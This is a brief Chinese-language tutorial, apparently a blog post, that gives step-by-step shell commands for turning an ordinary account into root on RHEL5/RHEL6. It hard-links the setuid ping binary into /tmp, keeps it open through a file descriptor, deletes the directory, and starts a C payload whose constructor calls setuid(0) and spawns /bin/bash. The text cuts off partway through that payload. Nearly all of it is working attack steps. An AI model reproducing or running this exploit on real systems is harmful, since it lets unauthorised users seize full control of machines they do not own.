提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
RHEL5-RHEL6下面都可以实现,root的UID是零
创建一个普通用户
useradd andy
切换到andy用户
su - andy
查看当前用户是谁
whoami
查看tmp目录权限
[andy@bogon tmp]$ ll -d /tmp
drwxrwxrwt. 15 root root 4096 6月 29 14:08 /tmp
切换到tmp目录
cd /tmp
创建一个exploit目录
mkdir exploit
查看ping命令带suid权限
ll /bin/ping
创建target文件硬链接
ln /bin/ping /tmp/exploit/target
查看target文件权限
ll /tmp/exploit/target
把target文件加载到内存中
exec 3< /tmp/exploit/target
查看target在内存中的情况
"ll /proc/$$/fd/3"
删除target文件
rm -rf /tmp/exploit/
查看target在内存中的情况是删除状态
"ll /proc/$$/fd/3"
创建一个c语言代码 [andy@bogon tmp]$ vim payload.c void __attribute__((constructor)) init() // 两个下划线 { setuid(0); system("/bin/bash